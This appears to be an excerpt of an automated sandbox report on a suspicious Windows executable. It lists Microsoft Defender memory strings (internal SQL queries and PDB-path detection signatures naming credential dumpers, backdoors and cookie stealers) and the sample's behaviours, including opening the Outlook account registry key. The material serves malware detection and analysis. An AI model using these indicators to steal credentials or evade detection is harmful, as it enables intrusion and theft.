Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: insert into blocksite (url) values('%s');
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: insert into blocksite (url) values('%s');x
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT (SELECT COUNT(*) FROM File) + (SELECT COUNT(*) FROM FileInstance);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305B1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle, 18_2_00007FF7E305B1C4
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8488:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8488:120:WilError_03
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Mutant created: \Sessions\1\BaseNamedObjects\sX3-pR8-aK2-pH9-l$O2$e
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \src\x64\Release\wajam_64.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: fastfat.pdbN source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: sctasks.pdbd source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: usp10.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: g711codc.pdb3 source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: reg.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: acpidisk.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: mgr.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp
Source: Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.b*m.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb*.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: \Dolphin.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: comp.pdbd source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: acpi.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: .+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\backdoor.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: MpSigStub.exe, 0000000B.00000003.18268971568.0000021B5F3F4000.00000004.00000001.sdmp
Source: Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: 6\Desktop\EK\Source\Rina_AC\Rina_AC\Release\Rina_AC.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
